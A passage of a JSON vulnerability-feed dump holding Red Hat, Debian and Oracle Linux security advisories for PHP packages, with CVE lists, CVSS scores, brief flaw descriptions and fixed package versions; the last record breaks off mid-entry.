Open Database Connectivity (ODBC) API, the PHP process\nin some cases terminated unexpectedly with a segmentation fault. The\nunderlying code has been adjusted to prevent this crash. (BZ#1212299)\n\n* Previously, running PHP on a big-endian system sometimes led to memory\ncorruption in the fileinfo module. This update adjusts the behavior of\nthe PHP pointer so that it can be freed without causing memory corruption.\n(BZ#1212298)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\n", "reporter": "RedHat", "published": "2015-06-23T04:00:00", "type": "redhat", "title": "(RHSA-2015:1135) Important: php security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-8142", "CVE-2014-9652", "CVE-2014-9705", "CVE-2014-9709", "CVE-2015-0231", "CVE-2015-0232", "CVE-2015-0273", "CVE-2015-2301", "CVE-2015-2348", "CVE-2015-2783", "CVE-2015-2787", "CVE-2015-3307", "CVE-2015-3329", "CVE-2015-3330", "CVE-2015-3411", "CVE-2015-3412", "CVE-2015-4021", "CVE-2015-4022", "CVE-2015-4024", "CVE-2015-4025", "CVE-2015-4026", "CVE-2015-4147", "CVE-2015-4148", "CVE-2015-4598", "CVE-2015-4599", "CVE-2015-4600", "CVE-2015-4601", "CVE-2015-4602", "CVE-2015-4603", "CVE-2015-4604", "CVE-2015-4605"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-04-12T03:33:12", "id": "RHSA-2015:1135", "href": "https://access.redhat.com/errata/RHSA-2015:1135", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T21:43:08", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.3-1.el6", "arch": "src", "packageName": "rh-php56", "packageFilename": "rh-php56-2.3-1.el6.src.rpm", "operator": "lt"}], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. The rh-php56 packages provide a recent stable release of PHP with PEAR 1.9.5 and enhanced language features including constant expressions, variadic functions, arguments unpacking, and the interactive debuger. The memcache, mongo, and XDebug extensions are also included.\n\nThe rh-php56 Software Collection has been upgraded to version 5.6.25, which provides a number of bug fixes and enhancements over the previous version. (BZ#1356157, BZ#1365401)\n\nSecurity Fixes in the rh-php56-php component:\n\n* Several Moderate and Low impact security issues were found in PHP. Under certain circumstances, these issues could cause PHP to crash, disclose portions of its memory, execute arbitrary code, or impact PHP application integrity. Space precludes documenting each of these issues in this advisory. Refer to the CVE links in the References section for a description of each of these vulnerabilities. (CVE-2013-7456, CVE-2014-9767, CVE-2015-8835, CVE-2015-8865, CVE-2015-8866, CVE-2015-8867, CVE-2015-8873, CVE-2015-8874, CVE-2015-8876, CVE-2015-8877, CVE-2015-8879, CVE-2016-1903, CVE-2016-2554, CVE-2016-3074, CVE-2016-3141, CVE-2016-3142, CVE-2016-4070, CVE-2016-4071, CVE-2016-4072, CVE-2016-4073, CVE-2016-4342, CVE-2016-4343, CVE-2016-4473, CVE-2016-4537, CVE-2016-4538, CVE-2016-4539, CVE-2016-4540, CVE-2016-4541, CVE-2016-4542, CVE-2016-4543, CVE-2016-4544, CVE-2016-5093, CVE-2016-5094, CVE-2016-5096, CVE-2016-5114, CVE-2016-5399, CVE-2016-5766, CVE-2016-5767, CVE-2016-5768, CVE-2016-5770, CVE-2016-5771, CVE-2016-5772, CVE-2016-5773, CVE-2016-6128, CVE-2016-6207, CVE-2016-6288, CVE-2016-6289, CVE-2016-6290, CVE-2016-6291, CVE-2016-6292, CVE-2016-6294, CVE-2016-6295, CVE-2016-6296, CVE-2016-6297, CVE-2016-7124, CVE-2016-7125, CVE-2016-7126, CVE-2016-7127, CVE-2016-7128, CVE-2016-7129, CVE-2016-7130, CVE-2016-7131, CVE-2016-7132)\n\n* Multiple flaws were found in the PCRE library included with the rh-php56-php packages for Red Hat Enterprise Linux 6. A specially crafted regular expression could cause PHP to crash or, possibly, execute arbitrary code. (CVE-2015-2325, CVE-2015-2326, CVE-2015-2327, CVE-2015-2328, CVE-2015-3210, CVE-2015-3217, CVE-2015-5073, CVE-2015-8381, CVE-2015-8383, CVE-2015-8384, CVE-2015-8385, CVE-2015-8386, CVE-2015-8388, CVE-2015-8391, CVE-2015-8392, CVE-2015-8395)\n\nRed Hat would like to thank Hans Jerry Illikainen for reporting CVE-2016-3074, CVE-2016-4473, and CVE-2016-5399.", "reporter": "RedHat", "published": "2016-11-15T16:13:31", "type": "redhat", "title": "(RHSA-2016:2750) Moderate: rh-php56 security, bug fix, and enhancement update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2013-7456", "CVE-2014-9767", "CVE-2015-2325", "CVE-2015-2326", "CVE-2015-2327", "CVE-2015-2328", "CVE-2015-3210", "CVE-2015-3217", "CVE-2015-5073", "CVE-2015-8381", "CVE-2015-8383", "CVE-2015-8384", "CVE-2015-8385", "CVE-2015-8386", "CVE-2015-8388", "CVE-2015-8391", "CVE-2015-8392", "CVE-2015-8395", "CVE-2015-8835", "CVE-2015-8865", "CVE-2015-8866", "CVE-2015-8867", "CVE-2015-8873", "CVE-2015-8874", "CVE-2015-8876", "CVE-2015-8877", "CVE-2015-8879", "CVE-2016-1903", "CVE-2016-2554", "CVE-2016-3074", "CVE-2016-3141", "CVE-2016-3142", "CVE-2016-4070", "CVE-2016-4071", "CVE-2016-4072", "CVE-2016-4073", "CVE-2016-4342", "CVE-2016-4343", "CVE-2016-4473", "CVE-2016-4537", "CVE-2016-4538", "CVE-2016-4539", "CVE-2016-4540", "CVE-2016-4541", "CVE-2016-4542", "CVE-2016-4543", "CVE-2016-4544", "CVE-2016-5093", "CVE-2016-5094", "CVE-2016-5096", "CVE-2016-5114", "CVE-2016-5399", "CVE-2016-5766", "CVE-2016-5767", "CVE-2016-5768", "CVE-2016-5770", "CVE-2016-5771", "CVE-2016-5772", "CVE-2016-5773", "CVE-2016-6128", "CVE-2016-6207", "CVE-2016-6288", "CVE-2016-6289", "CVE-2016-6290", "CVE-2016-6291", "CVE-2016-6292", "CVE-2016-6294", "CVE-2016-6295", "CVE-2016-6296", "CVE-2016-6297", "CVE-2016-7124", "CVE-2016-7125", "CVE-2016-7126", "CVE-2016-7127", "CVE-2016-7128", "CVE-2016-7129", "CVE-2016-7130", "CVE-2016-7131", "CVE-2016-7132"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-13T01:28:23", "id": "RHSA-2016:2750", "href": "https://access.redhat.com/errata/RHSA-2016:2750", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2018-10-18T13:49:16", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php5-intl_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php5-intl", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php5-xmlrpc_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php5-xmlrpc", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php5-cli_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php5-cli", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php5-pgsql_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php5-pgsql", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php5-snmp_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php5-snmp", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php5-imap_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php5-imap", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php5-gd_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php5-gd", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php5-xsl_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php5-xsl", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php5-cgi_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php5-cgi", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php5-readline_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php5-readline", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php5-tidy_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php5-tidy", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php5-sybase_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php5-sybase", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php5-enchant_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php5-enchant", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php5-ldap_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php5-ldap", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php5-mysql_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php5-mysql", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php5-odbc_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php5-odbc", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php5-pspell_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php5-pspell", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php5-interbase_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php5-interbase", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php5-recode_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php5-recode", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php5-mcrypt_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php5-mcrypt", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php5-dbg_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php5-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "libphp5-embed_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "libphp5-embed", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php-pear_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php-pear", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php5-fpm_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php5-fpm", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "libapache2-mod-php5_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "libapache2-mod-php5", "operator": "lt"}, {"OS": "Debian", "OSVersion": "7", "packageVersion": "5.4.41-0+deb7u1", "arch": "all", "packageFilename": "php5_5.4.41-0+deb7u1_all.deb", "packageName": "php5", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php5-curl_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php5-curl", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php5-dev_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php5-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php5_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php5", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php5-mysqlnd_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php5-mysqlnd", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php5-common_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php5-common", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php5-gmp_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php5-gmp", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php5-phpdbg_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php5-phpdbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "php5-sqlite_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "php5-sqlite", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "5.6.9+dfsg-0+deb8u1", "arch": "all", "packageFilename": "libapache2-mod-php5filter_5.6.9+dfsg-0+deb8u1_all.deb", "packageName": "libapache2-mod-php5filter", "operator": "lt"}], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3280-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nJune 07, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : php5\nCVE ID : CVE-2015-2783 CVE-2015-3329 CVE-2015-4021 CVE-2015-4022 \n CVE-2015-4024 CVE-2015-4025 CVE-2015-4026\n\nMultiple vulnerabilities have been discovered in PHP:\n\nCVE-2015-4025 / CVE-2015-4026\n\n Multiple function didn't check for NULL bytes in path names.\n\nCVE-2015-4024\n\n Denial of service when processing multipart/form-data requests.\n\nCVE-2015-4022\n\n Integer overflow in the ftp_genlist() function may result in\n denial of service or potentially the execution of arbitrary code.\n\nCVE-2015-4021 CVE-2015-3329 CVE-2015-2783\n\n Multiple vulnerabilities in the phar extension may result in\n denial of service or potentially the execution of arbitrary code\n when processing malformed archives.\n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 5.4.41-0+deb7u1.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 5.6.9+dfsg-0+deb8u1.\n\nFor the testing distribution (stretch), these problems have been fixed\nin version 5.6.9+dfsg-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 5.6.9+dfsg-1.\n\nWe recommend that you upgrade your php5 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "reporter": "Debian", "published": "2015-06-07T17:07:13", "title": "[SECURITY] [DSA 3280-1] php5 security update", "type": "debian", "enchantments": {"score": {"modified": "2018-10-18T13:49:16", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-2783", "CVE-2015-3329", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022"], "modified": "2015-06-07T17:07:13", "id": "DEBIAN:DSA-3280-1:3B96E", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2015/msg00175.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-16T22:14:22", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "6", "packageVersion": "5.3.3.1-7+squeeze27", "arch": "all", "packageFilename": "php5-xsl_5.3.3.1-7+squeeze27_all.deb", "packageName": "php5-xsl", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "5.3.3.1-7+squeeze27", "arch": "all", "packageFilename": "php5-odbc_5.3.3.1-7+squeeze27_all.deb", "packageName": "php5-odbc", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "5.3.3.1-7+squeeze27", "arch": "all", "packageFilename": "php5-ldap_5.3.3.1-7+squeeze27_all.deb", "packageName": "php5-ldap", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "5.3.3.1-7+squeeze27", "arch": "all", "packageFilename": "php-pear_5.3.3.1-7+squeeze27_all.deb", "packageName": "php-pear", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "5.3.3.1-7+squeeze27", "arch": "all", "packageFilename": "php5-mcrypt_5.3.3.1-7+squeeze27_all.deb", "packageName": "php5-mcrypt", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "5.3.3.1-7+squeeze27", "arch": "all", "packageFilename": "php5-recode_5.3.3.1-7+squeeze27_all.deb", "packageName": "php5-recode", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "5.3.3.1-7+squeeze27", "arch": "all", "packageFilename": "php5-interbase_5.3.3.1-7+squeeze27_all.deb", "packageName": "php5-interbase", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "5.3.3.1-7+squeeze27", "arch": "all", "packageFilename": "libapache2-mod-php5_5.3.3.1-7+squeeze27_all.deb", "packageName": "libapache2-mod-php5", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "5.3.3.1-7+squeeze27", "arch": "all", "packageFilename": "php5-enchant_5.3.3.1-7+squeeze27_all.deb", "packageName": "php5-enchant", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "5.3.3.1-7+squeeze27", "arch": "all", "packageFilename": "php5-snmp_5.3.3.1-7+squeeze27_all.deb", "packageName": "php5-snmp", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "5.3.3.1-7+squeeze27", "arch": "all", "packageFilename": "libapache2-mod-php5filter_5.3.3.1-7+squeeze27_all.deb", "packageName": "libapache2-mod-php5filter", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "5.3.3.1-7+squeeze27", "arch": "all", "packageFilename": "php5-cgi_5.3.3.1-7+squeeze27_all.deb", "packageName": "php5-cgi", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "5.3.3.1-7+squeeze27", "arch": "all", "packageFilename": "php5-imap_5.3.3.1-7+squeeze27_all.deb", "packageName": "php5-imap", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "5.3.3.1-7+squeeze27", "arch": "all", "packageFilename": "php5-cli_5.3.3.1-7+squeeze27_all.deb", "packageName": "php5-cli", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "5.3.3.1-7+squeeze27", "arch": "all", "packageFilename": "php5-intl_5.3.3.1-7+squeeze27_all.deb", "packageName": "php5-intl", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "5.3.3.1-7+squeeze27", "arch": "all", "packageFilename": "php5-gd_5.3.3.1-7+squeeze27_all.deb", "packageName": "php5-gd", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "5.3.3.1-7+squeeze27", "arch": "all", "packageFilename": "php5-pspell_5.3.3.1-7+squeeze27_all.deb", "packageName": "php5-pspell", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "5.3.3.1-7+squeeze27", "arch": "all", "packageFilename": "php5-mysql_5.3.3.1-7+squeeze27_all.deb", "packageName": "php5-mysql", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "5.3.3.1-7+squeeze27", "arch": "all", "packageFilename": "php5-pgsql_5.3.3.1-7+squeeze27_all.deb", "packageName": "php5-pgsql", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "5.3.3.1-7+squeeze27", "arch": "all", "packageFilename": "php5-curl_5.3.3.1-7+squeeze27_all.deb", "packageName": "php5-curl", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "5.3.3.1-7+squeeze27", "arch": "all", "packageFilename": "php5-sqlite_5.3.3.1-7+squeeze27_all.deb", "packageName": "php5-sqlite", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "5.3.3.1-7+squeeze27", "arch": "all", "packageFilename": "php5-xmlrpc_5.3.3.1-7+squeeze27_all.deb", "packageName": "php5-xmlrpc", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "5.3.3.1-7+squeeze27", "arch": "all", "packageFilename": "php5-sybase_5.3.3.1-7+squeeze27_all.deb", "packageName": "php5-sybase", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "5.3.3.1-7+squeeze27", "arch": "all", "packageFilename": "php5_5.3.3.1-7+squeeze27_all.deb", "packageName": "php5", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "5.3.3.1-7+squeeze27", "arch": "all", "packageFilename": "php5-tidy_5.3.3.1-7+squeeze27_all.deb", "packageName": "php5-tidy", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "5.3.3.1-7+squeeze27", "arch": "all", "packageFilename": "php5-dev_5.3.3.1-7+squeeze27_all.deb", "packageName": "php5-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "5.3.3.1-7+squeeze27", "arch": "all", "packageFilename": "php5-gmp_5.3.3.1-7+squeeze27_all.deb", "packageName": "php5-gmp", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "5.3.3.1-7+squeeze27", "arch": "all", "packageFilename": "php5-common_5.3.3.1-7+squeeze27_all.deb", "packageName": "php5-common", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "5.3.3.1-7+squeeze27", "arch": "all", "packageFilename": "php5-dbg_5.3.3.1-7+squeeze27_all.deb", "packageName": "php5-dbg", "operator": "lt"}], "description": "Package : php5\nVersion : 5.3.3.1-7+squeeze27\nCVE ID : CVE-2015-3307 CVE-2015-3411 CVE-2015-3412 CVE-2015-4021\n CVE-2015-4022 CVE-2015-4025 CVE-2015-4026 CVE-2015-4147\n CVE-2015-4148 CVE-2015-4598 CVE-2015-4599 CVE-2015-4600\n CVE-2015-4601 CVE-2015-4602 CVE-2015-4604 CVE-2015-4605\n CVE-2015-4643 CVE-2015-4644 CVE-2015-5589 CVE-2015-5590\n\n * CVE-2015-3307\n The phar_parse_metadata function in ext/phar/phar.c in PHP before\n 5.4.40, 5.5.x before 5.5.24, and 5.6.x before 5.6.8 allows remote\n attackers to cause a denial of service (heap metadata corruption)\n or possibly have unspecified other impact via a crafted tar archive.\n * CVE-2015-3411 + CVE-2015-3412\n Fixed bug #69353 (Missing null byte checks for paths in various\n PHP extensions)\n * CVE-2015-4021\n The phar_parse_tarfile function in ext/phar/tar.c in PHP\n before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9\n does not verify that the first character of a filename is\n different from the \\0 character, which allows remote attackers\n to cause a denial of service (integer underflow and memory\n corruption) via a crafted entry in a tar archive.\n * CVE-2015-4022\n Integer overflow in the ftp_genlist function in ext/ftp/ftp.c in PHP\n before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9 allows\n remote FTP servers to execute arbitrary code via a long reply to a\n LIST command, leading to a heap-based buffer overflow.\n * CVE-2015-4025\n PHP before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9\n truncates a pathname upon encountering a \\x00 character in certain\n situations, which allows remote attackers to bypass intended\n extension restrictions and access files or directories with\n unexpected names via a crafted argument to (1) set_include_path,\n (2) tempnam, (3) rmdir, or (4) readlink. NOTE: this vulnerability\n exists because of an incomplete fix for CVE-2006-7243.\n * CVE-2015-4026\n The pcntl_exec implementation in PHP before 5.4.41, 5.5.x before\n 5.5.25, and 5.6.x before 5.6.9 truncates a pathname upon encountering\n a \\x00 character, which might allow remote attackers to bypass\n intended extension restrictions and execute files with unexpected\n names via a crafted first argument. NOTE: this vulnerability exists\n because of an incomplete fix for CVE-2006-7243.\n * CVE-2015-4147\n The SoapClient::__call method in ext/soap/soap.c in PHP before\n 5.4.39, 5.5.x before 5.5.23, and 5.6.x before 5.6.7 does not\n verify that __default_headers is an array, which allows remote\n attackers to execute arbitrary code by providing crafted\n serialized data with an unexpected data type, related to a "type\n confusion" issue.\n * CVE-2015-4148\n The do_soap_call function in ext/soap/soap.c in PHP before 5.4.39,\n 5.5.x before 5.5.23, and 5.6.x before 5.6.7 does not verify that\n the uri property is a string, which allows remote attackers to\n obtain sensitive information by providing crafted serialized data\n with an int data type, related to a "type confusion" issue.\n * CVE-2015-4598\n Incorrect handling of paths with NULs\n * CVE-2015-4599\n Type confusion vulnerability in exception::getTraceAsString\n * CVE-2015-4600 + CVE-2015-4601\n Added type checks\n * CVE-2015-4602\n Type Confusion Infoleak Vulnerability in unserialize() with SoapFault\n * CVE-2015-4604 + CVE-2015-4605\n denial of service when processing a crafted file with Fileinfo\n (already fixed in CVE-2015-temp-68819.patch)\n * CVE-2015-4643\n Improved fix for bug #69545 (Integer overflow in ftp_genlist()\n resulting in heap overflow)\n * CVE-2015-4644\n Fixed bug #69667 (segfault in php_pgsql_meta_data)\n * CVE-2015-5589\n Segfault in Phar::convertToData on invalid file\n * CVE-2015-5590\n Buffer overflow and stack smashing error in phar_fix_filepath\n\n\n", "edition": 1, "reporter": "Debian", "published": "2015-09-07T20:30:38", "title": "[SECURITY] [DLA 307-1] php5 security update", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:14:22", "vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-4601", "CVE-2015-4644", "CVE-2015-4148", "CVE-2006-7243", "CVE-2015-4605", "CVE-2015-3307", "CVE-2015-4025", "CVE-2015-4021", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-4147", "CVE-2015-3411", "CVE-2015-4604", "CVE-2015-5590", "CVE-2015-4600", "CVE-2015-4022", "CVE-2015-3412", "CVE-2015-4599", "CVE-2015-4598", "CVE-2015-5589", "CVE-2015-4643"], "modified": "2015-09-07T20:30:38", "id": "DEBIAN:DLA-307-1:2C3AB", "href": "https://lists.debian.org/debian-lts-announce/2015/debian-lts-announce-201509/msg00002.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:49:20", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-3.el6", "arch": "x86_64", "packageFilename": "php54-php-fpm-5.4.40-3.el6.x86_64.rpm", "packageName": "php54-php-fpm", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-3.el7", "arch": "x86_64", "packageFilename": "php54-php-fpm-5.4.40-3.el7.x86_64.rpm", "packageName": "php54-php-fpm", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-3.el6", "arch": "src", "packageFilename": "php54-php-5.4.40-3.el6.src.rpm", "packageName": "php54-php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-3.el7", "arch": "x86_64", "packageFilename": "php54-php-process-5.4.40-3.el7.x86_64.rpm", "packageName": "php54-php-process", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-3.el6", "arch": "x86_64", "packageFilename": "php54-php-dba-5.4.40-3.el6.x86_64.rpm", "packageName": "php54-php-dba", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-3.el7", "arch": "x86_64", "packageFilename": "php54-php-pspell-5.4.40-3.el7.x86_64.rpm", "packageName": "php54-php-pspell", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-3.el6", "arch": "x86_64", "packageFilename": "php54-php-devel-5.4.40-3.el6.x86_64.rpm", "packageName": 